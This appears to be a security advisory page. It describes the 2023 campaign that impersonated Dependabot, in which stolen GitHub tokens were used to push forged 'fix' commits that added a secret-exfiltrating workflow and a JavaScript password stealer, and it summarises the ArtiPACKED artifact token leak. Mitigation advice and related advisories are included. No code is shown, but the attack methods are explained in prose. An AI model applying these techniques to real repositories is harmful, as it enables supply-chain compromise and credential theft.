SC-DEPENDABOT-IMPERSONATION-2023
CI/CD · GitHub · GitHub repositories (Dependabot impersonation)
Summary
Between July 8 and July 11, 2023, in a campaign documented by Checkmarx, attackers pushed malicious commits to hundreds of public and private GitHub repositories while disguising them as automated contributions from the legitimate Dependabot bot. The attackers obtained victims' GitHub Personal Access Tokens, likely exfiltrated from developer machines via a malicious open-source package, and used those tokens to push commits whose author and commit message ('fix') were falsified to appear as the dependabot[bot] account, since Git and the GitHub API let a token holder set arbitrary commit metadata and PAT activity does not surface in the account audit log. Each malicious commit added a GitHub Actions workflow file (hook.yml) that triggered on every push and exfiltrated the project's defined secrets and environment variables to an attacker-controlled command-and-control server. The same commits modified existing JavaScript files in the repository, injecting obfuscated web-form password-stealer code that captured credentials submitted by end users and forwarded them to the same server. Most affected accounts belonged to Indonesian developers.
How to avoid it in your code
- Replace long-lived PATs with short-lived, fine-grained, least-privilege tokens.
- Require signed commits and verify the 'Verified' badge rather than trusting author names.
- Monitor for unexpected workflow files and commits attributed to bots.
- Rotate any exposed PATs immediately and audit repository secrets.
- Scan dependencies and developer machines for credential-stealing packages.
References
Related vulnerabilities
All Supply chain →- CRITICALGHSA-4XPC-PV4P-PM3W
LiteLLM: Authentication Bypass via Host Header Injection
- MEDIUMGHSA-X7CF-6GP3-Q5F8
Duplicate Advisory: MCP Streamable HTTP redirects could forward configured custom headers to another origin
- HIGHGHSA-F59H-Q822-G45G
Caddy: FastCGI header normalization bypass in `forward_auth copy_headers`
- HIGHGHSA-F989-C77F-R2CQ
Crawl4AI: LLM credential exfiltration in Docker server via request base_url and env: token resolution
- MEDIUMGHSA-JVC7-762P-3743
n8n: Missing Token Validation on Microsoft Agent 365 Trigger and Stripe Nodes
- HIGHSC-ARTIPACKED-2024
On August 13, 2024, Palo Alto Networks Unit 42 published ArtiPACKED, a widespread CI/CD misconfiguration class in which GitHub Actions build artifacts inadvertently leaked authentication tokens, affecting major open-source projects from Google, Microsoft, Red Hat, AWS, Canonical, and OWASP. The root cause is that actions/checkout persists credentials by default, writing the workflow's GITHUB_TOKEN into the checked-out .git/config for authenticated Git operations; when a later step uploaded the workspace (test results, build output, or the full checkout directory) via actions/upload-artifact, the .git directory and its embedded token, along with environment-derived secrets and cloud credentials, were packaged into the downloadable artifact. Because v4 artifacts can be downloaded while the run is still in progress and are readable by anyone for public repositories, an attacker could win a race condition: download the artifact, extract the still-valid GITHUB_TOKEN before the job completed and the token expired, and use it to push code, create branches, or pivot into connected cloud environments. Unit 42 identified numerous large projects leaking tokens this way and disclosed each responsibly for remediation.